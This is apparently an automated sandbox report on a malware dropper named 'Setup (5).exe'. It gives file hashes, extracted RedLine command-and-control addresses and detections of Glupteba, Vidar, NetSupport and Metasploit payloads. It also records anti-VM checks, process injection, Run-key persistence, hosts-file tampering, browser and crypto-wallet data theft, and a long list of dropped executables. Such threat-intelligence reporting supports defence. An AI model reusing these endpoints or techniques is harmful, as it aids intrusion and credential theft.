Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
153s -
max time network
1812s -
platform
windows11_x64 -
resource
win11 -
submitted
21-08-2021 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (5).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
19.08
95.181.172.100:6795
Extracted
redline
dibild
135.148.139.222:33569
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral27/memory/4568-371-0x00000000049C0000-0x00000000052E6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5664 4972 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral27/memory/4804-292-0x0000000000000000-mapping.dmp family_redline behavioral27/memory/5000-303-0x0000000000000000-mapping.dmp family_redline behavioral27/memory/5000-307-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral27/memory/4804-297-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comEsplorarne.exe.comdescription pid process target process PID 2872 created 3684 2872 WerFault.exe kWs5sSjR4k3xXHmO4XLag8d6.exe PID 4056 created 2464 4056 WerFault.exe DeXoDhHO4fs8ErAGxqZ46K2p.exe PID 1020 created 3396 1020 WerFault.exe O5TjB46UfglGUEdrVFJnqcV8.exe PID 3216 created 3104 3216 WerFault.exe W4sDxcb8D309KQCgTNmXJRUk.exe PID 4844 created 968 4844 WerFault.exe JReCxrSZ5O_Lnjfb2WaAEeOU.exe PID 1128 created 4576 1128 WerFault.exe dfTxMY_IfJyT9BulZM6DJnA2.exe PID 2316 created 4568 2316 WerFault.exe xmwrvdcY_Yfi3N5BkNTNaobs.exe PID 5116 created 1296 5116 Esplorarne.exe.com cmd.exe PID 6660 created 4996 6660 WerFault.exe askinstall53.exe PID 5596 created 4704 5596 WerFault.exe vLMv9enxfOQSyOhkmUT9HBGQ.exe PID 6644 created 4676 6644 WerFault.exe msedge.exe PID 864 created 1192 864 WerFault.exe rundll32.exe PID 5968 created 4000 5968 Esplorarne.exe.com Esplorarne.exe.com PID 6548 created 1684 6548 Esplorarne.exe.com msedge.exe PID 2780 created 1068 2780 WerFault.exe Esplorarne.exe.com PID 3416 created 6856 3416 WerFault.exe lDYC80QV081554Naoz9Vbsa4.exe PID 1444 created 4720 1444 WerFault.exe 1480338.exe PID 6148 created 4916 6148 Esplorarne.exe.com xFffrgVZ75SK5h08NUqgNu0o.exe PID 8152 created 4456 8152 Esplorarne.exe.com Cleaner.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral27/memory/2464-253-0x0000000004130000-0x00000000041CD000-memory.dmp family_vidar behavioral27/memory/1296-432-0x0000000004A30000-0x0000000004ACD000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
3377047_logo_media.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe -
Executes dropped EXE 64 IoCs
Processes:
O5TjB46UfglGUEdrVFJnqcV8.exebp6rLacE0rY6LNrjOO_TxmEr.exegwyroycDer67hXuPDw56Y8dx.exeGaGn0YZ1Xn4dsxDCBdKU27Z4.exexmwrvdcY_Yfi3N5BkNTNaobs.exeNGSx7_M3OHWSeBxQFu9pEcYE.exedfTxMY_IfJyT9BulZM6DJnA2.exet7Xvr_mcY4U0EgrksDdHs2hI.exeDeXoDhHO4fs8ErAGxqZ46K2p.exe4TxEGrcFaLMUzJf7EnXhU_B_.exeBfG52BypxnLPuragVMr93q4y.exeW4sDxcb8D309KQCgTNmXJRUk.exekWs5sSjR4k3xXHmO4XLag8d6.exezT7lzmRyAz5Sh_dhGoZkPLf_.exe6dBlR9ES_h9uZiKUQGcURO6C.exepIQ3ulIMRDHkTcxzXZA50m3y.exeJReCxrSZ5O_Lnjfb2WaAEeOU.exejooyu.exeDpLRG_KNuUytQZuMpgd6PuVG.exemd8_8eus.exeO5TjB46UfglGUEdrVFJnqcV8.execustomer3.exeDpLRG_KNuUytQZuMpgd6PuVG.tmp1480338.exe4175631.exet7Xvr_mcY4U0EgrksDdHs2hI.exeNGSx7_M3OHWSeBxQFu9pEcYE.exevdi_compiler.exeConhost.exe5632698.exe2aSLfjkYYD2DshoQd7V_7CdH.exe11111.execmd.exeultramediaburner.tmpCleaner Installation.exeWEATHER Manager.exeVPN.exemd7_7dfj.exeaskinstall53.exeMediaBurner2.exeVPN.tmpInlog.tmpWEATHER Manager.tmpCleaner.exezhaoy-game.exeWinHoster.exeLivelyScreenRecS1.9.exelDYC80QV081554Naoz9Vbsa4.exeMediaBurner2.tmpxtect12.exeEsplorarne.exe.com3377047_logo_media.exeEsplorarne.exe.com11111.exe6961886.exe7773517.exe1029648.exe1309205.exe3010462.exetmp5871_tmp.exemsedge.exeHXce4NrG7u2T3ob0w0IpJDbM.exevLMv9enxfOQSyOhkmUT9HBGQ.exepid process 2988 O5TjB46UfglGUEdrVFJnqcV8.exe 5036 bp6rLacE0rY6LNrjOO_TxmEr.exe 3060 gwyroycDer67hXuPDw56Y8dx.exe 3852 GaGn0YZ1Xn4dsxDCBdKU27Z4.exe 4568 xmwrvdcY_Yfi3N5BkNTNaobs.exe 4584 NGSx7_M3OHWSeBxQFu9pEcYE.exe 4576 dfTxMY_IfJyT9BulZM6DJnA2.exe 4560 t7Xvr_mcY4U0EgrksDdHs2hI.exe 2464 DeXoDhHO4fs8ErAGxqZ46K2p.exe 2344 4TxEGrcFaLMUzJf7EnXhU_B_.exe 3896 BfG52BypxnLPuragVMr93q4y.exe 3104 W4sDxcb8D309KQCgTNmXJRUk.exe 3684 kWs5sSjR4k3xXHmO4XLag8d6.exe 4984 zT7lzmRyAz5Sh_dhGoZkPLf_.exe 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe 3272 pIQ3ulIMRDHkTcxzXZA50m3y.exe 968 JReCxrSZ5O_Lnjfb2WaAEeOU.exe 3696 jooyu.exe 1068 DpLRG_KNuUytQZuMpgd6PuVG.exe 2256 md8_8eus.exe 3396 O5TjB46UfglGUEdrVFJnqcV8.exe 3368 customer3.exe 3108 DpLRG_KNuUytQZuMpgd6PuVG.tmp 4720 1480338.exe 4676 4175631.exe 4804 t7Xvr_mcY4U0EgrksDdHs2hI.exe 5000 NGSx7_M3OHWSeBxQFu9pEcYE.exe 3676 vdi_compiler.exe 2584 Conhost.exe 2800 5632698.exe 4720 1480338.exe 3232 2aSLfjkYYD2DshoQd7V_7CdH.exe 5036 11111.exe 1296 cmd.exe 2428 ultramediaburner.tmp 3604 Cleaner Installation.exe 1756 WEATHER Manager.exe 1300 VPN.exe 4160 md7_7dfj.exe 4996 askinstall53.exe 4140 MediaBurner2.exe 4644 VPN.tmp 3872 Inlog.tmp 3736 WEATHER Manager.tmp 4456 Cleaner.exe 5024 zhaoy-game.exe 4980 WinHoster.exe 1184 LivelyScreenRecS1.9.exe 3644 lDYC80QV081554Naoz9Vbsa4.exe 3268 MediaBurner2.tmp 5292 xtect12.exe 5756 Esplorarne.exe.com 6032 3377047_logo_media.exe 5164 Esplorarne.exe.com 5256 11111.exe 5584 6961886.exe 5912 7773517.exe 4040 1029648.exe 5432 1309205.exe 5564 3010462.exe 1276 tmp5871_tmp.exe 3032 msedge.exe 2112 HXce4NrG7u2T3ob0w0IpJDbM.exe 4704 vLMv9enxfOQSyOhkmUT9HBGQ.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
pIQ3ulIMRDHkTcxzXZA50m3y.exe4TxEGrcFaLMUzJf7EnXhU_B_.exeIOfzQKry13MDO41qVpDnSPol.exe2aSLfjkYYD2DshoQd7V_7CdH.exeVI0TTJdNqDFHe87DIisPsVvC.exeGaGn0YZ1Xn4dsxDCBdKU27Z4.exegwyroycDer67hXuPDw56Y8dx.exeQAkoadVPmpufjE2d8maWP2Qa.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion pIQ3ulIMRDHkTcxzXZA50m3y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4TxEGrcFaLMUzJf7EnXhU_B_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IOfzQKry13MDO41qVpDnSPol.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2aSLfjkYYD2DshoQd7V_7CdH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VI0TTJdNqDFHe87DIisPsVvC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GaGn0YZ1Xn4dsxDCBdKU27Z4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gwyroycDer67hXuPDw56Y8dx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion pIQ3ulIMRDHkTcxzXZA50m3y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4TxEGrcFaLMUzJf7EnXhU_B_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QAkoadVPmpufjE2d8maWP2Qa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IOfzQKry13MDO41qVpDnSPol.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gwyroycDer67hXuPDw56Y8dx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2aSLfjkYYD2DshoQd7V_7CdH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GaGn0YZ1Xn4dsxDCBdKU27Z4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QAkoadVPmpufjE2d8maWP2Qa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VI0TTJdNqDFHe87DIisPsVvC.exe -
Loads dropped DLL 31 IoCs
Processes:
DpLRG_KNuUytQZuMpgd6PuVG.tmpCleaner Installation.exerundll32.exeInlog.tmpVPN.tmpWEATHER Manager.tmpMediaBurner2.tmpConhost.exemsedge.exerundll32.exeGameBoxWin64.exeEsplorarne.exe.comSetup.tmpMsiExec.exeEsplorarne.exe.compid process 3108 DpLRG_KNuUytQZuMpgd6PuVG.tmp 3108 DpLRG_KNuUytQZuMpgd6PuVG.tmp 3604 Cleaner Installation.exe 4404 rundll32.exe 3872 Inlog.tmp 3872 Inlog.tmp 4644 VPN.tmp 4644 VPN.tmp 3736 WEATHER Manager.tmp 3736 WEATHER Manager.tmp 3268 MediaBurner2.tmp 6212 Conhost.exe 7012 msedge.exe 7012 msedge.exe 1192 rundll32.exe 6984 GameBoxWin64.exe 6984 GameBoxWin64.exe 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 7420 Setup.tmp 7188 MsiExec.exe 7188 MsiExec.exe 7360 Esplorarne.exe.com 7360 Esplorarne.exe.com 7360 Esplorarne.exe.com -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\4TxEGrcFaLMUzJf7EnXhU_B_.exe themida C:\Users\Admin\Documents\GaGn0YZ1Xn4dsxDCBdKU27Z4.exe themida C:\Users\Admin\Documents\gwyroycDer67hXuPDw56Y8dx.exe themida C:\Users\Admin\Documents\GaGn0YZ1Xn4dsxDCBdKU27Z4.exe themida C:\Users\Admin\Documents\gwyroycDer67hXuPDw56Y8dx.exe themida C:\Users\Admin\Documents\pIQ3ulIMRDHkTcxzXZA50m3y.exe themida C:\Users\Admin\Documents\pIQ3ulIMRDHkTcxzXZA50m3y.exe themida C:\Users\Admin\Documents\4TxEGrcFaLMUzJf7EnXhU_B_.exe themida behavioral27/memory/3852-231-0x00000000005B0000-0x00000000005B1000-memory.dmp themida behavioral27/memory/3060-243-0x0000000000BB0000-0x0000000000BB1000-memory.dmp themida behavioral27/memory/3272-251-0x00000000009B0000-0x00000000009B1000-memory.dmp themida behavioral27/memory/2344-257-0x00000000006B0000-0x00000000006B1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Conhost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" Conhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
4TxEGrcFaLMUzJf7EnXhU_B_.exemd8_8eus.exeIOfzQKry13MDO41qVpDnSPol.exe2aSLfjkYYD2DshoQd7V_7CdH.exeVI0TTJdNqDFHe87DIisPsVvC.exeGaGn0YZ1Xn4dsxDCBdKU27Z4.exegwyroycDer67hXuPDw56Y8dx.exeQAkoadVPmpufjE2d8maWP2Qa.exepIQ3ulIMRDHkTcxzXZA50m3y.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4TxEGrcFaLMUzJf7EnXhU_B_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IOfzQKry13MDO41qVpDnSPol.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2aSLfjkYYD2DshoQd7V_7CdH.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VI0TTJdNqDFHe87DIisPsVvC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GaGn0YZ1Xn4dsxDCBdKU27Z4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gwyroycDer67hXuPDw56Y8dx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QAkoadVPmpufjE2d8maWP2Qa.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA pIQ3ulIMRDHkTcxzXZA50m3y.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Cleaner Installation.exemsiexec.exeConhost.exedescription ioc process File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\S: Conhost.exe File opened (read-only) \??\X: Conhost.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\K: Conhost.exe File opened (read-only) \??\V: Conhost.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: Conhost.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: Conhost.exe File opened (read-only) \??\O: Conhost.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: Conhost.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: Conhost.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: Conhost.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: Conhost.exe File opened (read-only) \??\Q: Conhost.exe File opened (read-only) \??\U: Conhost.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: Conhost.exe File opened (read-only) \??\M: Conhost.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: Conhost.exe File opened (read-only) \??\W: Conhost.exe File opened (read-only) \??\Z: Conhost.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: Conhost.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: Conhost.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 134 ipinfo.io 268 ipinfo.io 36 ip-api.com 101 ipinfo.io 27 ipinfo.io 140 ipinfo.io 146 ipinfo.io 155 ipinfo.io 225 ipinfo.io 235 ipinfo.io 2 ipinfo.io 3 ipinfo.io 287 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
GaGn0YZ1Xn4dsxDCBdKU27Z4.exegwyroycDer67hXuPDw56Y8dx.exe4TxEGrcFaLMUzJf7EnXhU_B_.exepIQ3ulIMRDHkTcxzXZA50m3y.exeQAkoadVPmpufjE2d8maWP2Qa.exeIOfzQKry13MDO41qVpDnSPol.exeVI0TTJdNqDFHe87DIisPsVvC.exe2aSLfjkYYD2DshoQd7V_7CdH.exepid process 3852 GaGn0YZ1Xn4dsxDCBdKU27Z4.exe 3060 gwyroycDer67hXuPDw56Y8dx.exe 2344 4TxEGrcFaLMUzJf7EnXhU_B_.exe 3272 pIQ3ulIMRDHkTcxzXZA50m3y.exe 440 QAkoadVPmpufjE2d8maWP2Qa.exe 3876 IOfzQKry13MDO41qVpDnSPol.exe 1668 VI0TTJdNqDFHe87DIisPsVvC.exe 3232 2aSLfjkYYD2DshoQd7V_7CdH.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
t7Xvr_mcY4U0EgrksDdHs2hI.exeNGSx7_M3OHWSeBxQFu9pEcYE.exeHXce4NrG7u2T3ob0w0IpJDbM.exeEsplorarne.exe.comxXPw8gzq7kyFNlvwvOjz3cm1.exedescription pid process target process PID 4560 set thread context of 4804 4560 t7Xvr_mcY4U0EgrksDdHs2hI.exe t7Xvr_mcY4U0EgrksDdHs2hI.exe PID 4584 set thread context of 5000 4584 NGSx7_M3OHWSeBxQFu9pEcYE.exe NGSx7_M3OHWSeBxQFu9pEcYE.exe PID 2112 set thread context of 7020 2112 HXce4NrG7u2T3ob0w0IpJDbM.exe Esplorarne.exe.com PID 5348 set thread context of 6852 5348 Esplorarne.exe.com A2MeOTLlVVy7eGu_Qu_gdUsq.exe PID 5740 set thread context of 1684 5740 xXPw8gzq7kyFNlvwvOjz3cm1.exe msedge.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Esplorarne.exe.com2aSLfjkYYD2DshoQd7V_7CdH.exeSetup.tmp6dBlR9ES_h9uZiKUQGcURO6C.exeSetup.exedescription ioc process File created C:\Program Files (x86)\MaskVPN\driver\win764\is-6DBNJ.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-QKKLD.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-D05OA.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-SFAK0.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-UCTKI.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-J1BI8.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EGLRI.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-E3NCT.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-1VOL9.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-3D192.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-614SN.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-88R6L.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-QMIT1.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\unins000.msg Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-KDNHS.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-SFTGN.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-MGUMC.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-CTTFD.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 6dBlR9ES_h9uZiKUQGcURO6C.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-5LQF6.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-SOGAP.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-34SAC.tmp Esplorarne.exe.com File created C:\Program Files 